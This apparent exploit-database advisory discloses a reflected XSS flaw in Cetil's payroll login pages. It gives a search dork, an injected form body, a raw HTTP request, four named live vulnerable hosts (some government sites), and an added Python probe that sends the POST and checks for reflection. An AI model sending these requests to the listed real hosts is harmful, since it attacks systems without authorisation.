Software made by Cetil but now distributed for free by the Brazilian government suffers from a cross-site scripting vulnerability. Note that this finding contains site-specific data.
43b8dc21aeb405e4b5208b0ce417048266d66db58b7bb5799ac9cdca9d81eaf1
[+] POST-based Cross Site Scripting on Cetil - Demonstrativo de Pagamento de Salário
[+] Date: 27/05/2014
[+] Risk: LOW
[+] CWE number: CWE-79
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.cetil.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: logon_senha.asp
[+] Dork: CETIL - Demonstrativo de Pagamento de Salário
[+] Exploit : POST to http://host/path/logon_senha.asp (the login form on logon_senha.asp submits to logon_digitado.asp, as in the request below) with the form body
UID=%3Cmarquee%3Efelipe+andrian+peixoto&senha=teste&Submit=ok
[+] Example:
POST /gpweb/logon_digitado.asp HTTP/1.1
Host: gpweb.unitau.br:88
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://gpweb.unitau.br:88/gpweb/logon_senha.asp
Cookie: ASPSESSIONIDSCSTDSCD=CAFFKGICPDHEPMAAEDBKCJIK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

UID=%3Cmarquee%3Efelipe+andrian+peixoto&senha=teste&Submit=ok
[+] PoC : http://gpweb.unitau.br:88/gpweb/logon_senha.asp
http://www.saosebastiao.sp.gov.br/gpcetilweb/logon_senha.asp
http://201.38.74.75/gpweb/logon_senha.asp
http://holerite.apucarana.pr.gov.br/logon_senha.asp
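The following is an added example, not part of the original advisory and not Cetil's code. It rebuilds the advisory's POST body from the parameter values (so the Content-Length of 61 can be verified rather than hand-counted) and classifies how the UID marker comes back in a response: reflected as a raw tag (the XSS condition), reflected only in HTML-encoded form (what a Server.HTMLEncode-style fix would produce), or not reflected at all. The two sample responses are constructed here to model a vulnerable and a fixed server; they were not captured from any host listed above. The probe() helper performs the live POST and is only for targets you are authorised to test.

```python
"""Rebuild the advisory's POST and classify how the UID parameter is reflected.

Added example for the logon_senha.asp / logon_digitado.asp XSS advisory.
The sample responses below are constructed, not captured from a real host.
"""
import html
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Marker from the advisory: a harmless tag that is easy to spot in output.
PAYLOAD = "<marquee>felipe andrian peixoto"


def build_form_body(uid: str, senha: str = "teste", submit: str = "ok") -> str:
    """Build the application/x-www-form-urlencoded body used in the advisory.

    urlencode() uses quote_plus, so '<' -> %3C, '>' -> %3E and ' ' -> '+',
    which reproduces the advisory's body byte for byte.
    """
    return urlencode({"UID": uid, "senha": senha, "Submit": submit})


def build_raw_request(host: str, path: str, body: str) -> str:
    """Render the POST as raw HTTP/1.1 text, computing Content-Length from the body."""
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",
    ]
    # Blank line separates headers from the body.
    return "\r\n".join(headers) + "\r\n\r\n" + body


def classify_reflection(response_html: str, marker: str) -> str:
    """Return 'raw', 'encoded' or 'absent' for how the marker appears in the response.

    'raw'     - the literal tag text is present, so an injected tag is rendered (XSS)
    'encoded' - only the HTML-escaped form (&lt;marquee&gt;...) is present: safe output
    'absent'  - the input is not reflected at all
    """
    if marker in response_html:
        return "raw"
    if html.escape(marker, quote=True) in response_html:
        return "encoded"
    return "absent"


def probe(url: str, timeout: float = 10.0) -> str:
    """Send the advisory's POST to a target you are authorised to test and classify it."""
    body = build_form_body(PAYLOAD).encode()
    req = Request(url, data=body, method="POST",
                  headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(req, timeout=timeout) as resp:
        charset = resp.headers.get_content_charset() or "latin-1"
        page = resp.read().decode(charset, "replace")
    return classify_reflection(page, PAYLOAD)


# Constructed sample responses (assumed output shapes, not real server output).
VULNERABLE_RESPONSE = (
    "<html><body>Usuário <marquee>felipe andrian peixoto não encontrado</body></html>"
)
FIXED_RESPONSE = (
    "<html><body>Usuário &lt;marquee&gt;felipe andrian peixoto não encontrado</body></html>"
)


if __name__ == "__main__":
    body = build_form_body(PAYLOAD)
    # Host and path taken from the advisory's example request.
    print(build_raw_request("gpweb.unitau.br:88", "/gpweb/logon_digitado.asp", body))
    print("vulnerable sample:", classify_reflection(VULNERABLE_RESPONSE, PAYLOAD))
    print("fixed sample:     ", classify_reflection(FIXED_RESPONSE, PAYLOAD))
```

The 'raw' check is deliberately tested before the 'encoded' one: a page that echoes the value twice, once escaped and once not, is still exploitable, so the unsafe reflection must win.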